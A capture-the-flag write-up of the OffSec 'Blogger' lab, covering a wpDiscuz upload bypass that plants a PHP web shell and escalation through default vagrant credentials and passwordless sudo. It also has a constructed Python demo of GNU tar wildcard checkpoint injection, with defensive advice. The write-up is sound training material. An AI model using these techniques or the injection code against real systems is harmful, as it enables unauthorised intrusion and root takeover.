Blogger - OffSec Proving Grounds
Objective
Utilize enumeration and web enumeration techniques to uncover vulnerabilities. Engage in privilege escalation by abusing sudo permissions to gain elevated access. This lab is designed to test your skills in identifying and exploiting system weaknesses.
Enumeration
Nmap
Initial Nmap enumeration revealed open SSH and HTTP ports.
Web Enumeration
While analyzing the website structure, I came across a blog page that was unexpectedly located under the /assets/fonts/ folder.
The blog page turned out to be a WordPress installation, but it was only accessible via the blogger.pg domain. To access it locally, I added an entry for blogger.pg to my /etc/hosts file.
WordPress Enumeration
I then attempted user enumeration and brute-forcing against the WordPress login. While I was able to identify valid usernames, the brute-force attack did not yield any working credentials.
Using aggressive plugin detection, I identified a vulnerable plugin “wpDiscuz” installed on the WordPress site.
Exploitation
The vulnerability in the wpDiscuz plugin lies in the comment attachment upload on blog posts. The upload check trusts the file's content type rather than its extension, so a PHP file prefixed with the GIF magic number (GIF89a) is accepted as an image and stored where the web server will still execute it as PHP. I leveraged this with a publicly available script that uploads a PHP web shell as a comment attachment to any chosen blog post.
The initial web shell uploaded via the vulnerable comment section was unresponsive. To gain a more stable shell, I executed a Python reverse shell from within it, which successfully established a fully interactive connection back to my listener.
Privilege Escalation
Once inside the system, I located database credentials in the wp-config.php file. Using these, I accessed the MySQL database and found a hashed password belonging to the user james. However, despite several attempts, I was unable to crack the hash.
I then discovered a backup script listed in the crontab jobs, which ran tar with an unquoted wildcard (tar *), suggesting a potential wildcard-based privilege escalation. However, upon further inspection, I realized that the script was executed in a directory where I lacked write permissions, so I could not plant the option-named files the technique relies on, and this path was unfeasible.
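The following added example (constructed for this writeup, not the lab's backup script) shows what the cron job would have allowed had the directory been writable: two files whose names expand into GNU tar's --checkpoint options, causing tar to run an attacker-chosen script, together with the writability precondition that ruled the path out here. The backup directory, file names and marker file are assumptions; the demo requires GNU tar and reports "unsupported" otherwise. Run as root the "blocked" case cannot be demonstrated, because root bypasses directory permissions.

```python
"""GNU tar wildcard (checkpoint) injection and its precondition.

Constructed for this writeup; paths and names are assumptions. The cron job
is modelled as `cd <dir> && tar cf <archive> *`, with sh expanding the glob.
"""
import os
import shutil
import subprocess
import tempfile


def gnu_tar_available() -> bool:
    """--checkpoint-action is GNU-specific; bsdtar does not implement it."""
    tar = shutil.which("tar")
    if not tar:
        return False
    try:
        out = subprocess.run([tar, "--version"], capture_output=True, text=True).stdout
    except OSError:
        return False
    return "GNU tar" in out


def running_as_root() -> bool:
    return hasattr(os, "geteuid") and os.geteuid() == 0


def attacker_can_plant(directory: str) -> bool:
    """The technique needs new files in the globbed directory: this is the
    check the writeup made by hand when it ruled the path out."""
    return os.access(directory, os.W_OK | os.X_OK)


def plant_checkpoint_files(directory: str) -> None:
    """File names that `tar cf archive *` expands into options.

    They must be two separate files (tar sees two arguments). The action's
    script path has to be relative, since a file name cannot contain '/'.
    """
    for name in ("--checkpoint=1", "--checkpoint-action=exec=sh shell.sh"):
        open(os.path.join(directory, name), "w").close()


def run_backup_job(directory: str, archive: str) -> None:
    """Stand-in for the cron entry: unquoted wildcard expanded by sh."""
    subprocess.run(["sh", "-c", f"cd '{directory}' && tar cf '{archive}' *"],
                   capture_output=True)


def demo(writable: bool = True) -> str:
    """'exploited' if the planted script ran, 'blocked' if the directory is not
    writable, 'unsupported' without GNU tar, 'not triggered' otherwise."""
    if not gnu_tar_available():
        return "unsupported"
    work = tempfile.mkdtemp(prefix="tarwild-")
    backup_dir = os.path.join(work, "backup")
    os.mkdir(backup_dir)
    try:
        for name in ("notes.txt", "db.sql"):            # constructed victim data
            with open(os.path.join(backup_dir, name), "w") as f:
                f.write("data\n")
        marker = os.path.join(work, "pwned")
        with open(os.path.join(backup_dir, "shell.sh"), "w") as f:
            # A real attacker would e.g. chmod u+s /bin/bash; a marker file suffices here.
            f.write(f"#!/bin/sh\ntouch '{marker}'\n")
        if not writable:
            os.chmod(backup_dir, 0o555)
        if not attacker_can_plant(backup_dir):
            return "blocked"
        plant_checkpoint_files(backup_dir)
        run_backup_job(backup_dir, os.path.join(work, "backup.tar"))
        return "exploited" if os.path.exists(marker) else "not triggered"
    finally:
        os.chmod(backup_dir, 0o755)
        shutil.rmtree(work, ignore_errors=True)


if __name__ == "__main__":
    print("writable directory:", demo(writable=True))
    print("read-only directory:", demo(writable=False))
```

The fix on the defensive side is the same one the lab accidentally had in place, plus hygiene: never glob as root in a directory others can write to, and pass an explicit path or use `--` before the file list so names cannot become options.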
Later, I found a .creds file under the /opt directory that appeared to contain encrypted credentials. I was unable to decrypt it, so this path did not lead to privilege escalation either.
While exploring the system, I noticed a vagrant user listed in /etc/passwd and confirmed the presence of their home directory. I tried the default credentials vagrant:vagrant, which successfully granted access. Running sudo -l revealed that the vagrant user had passwordless sudo privileges. I then executed sudo bash -p to escalate privileges and obtained a root shell.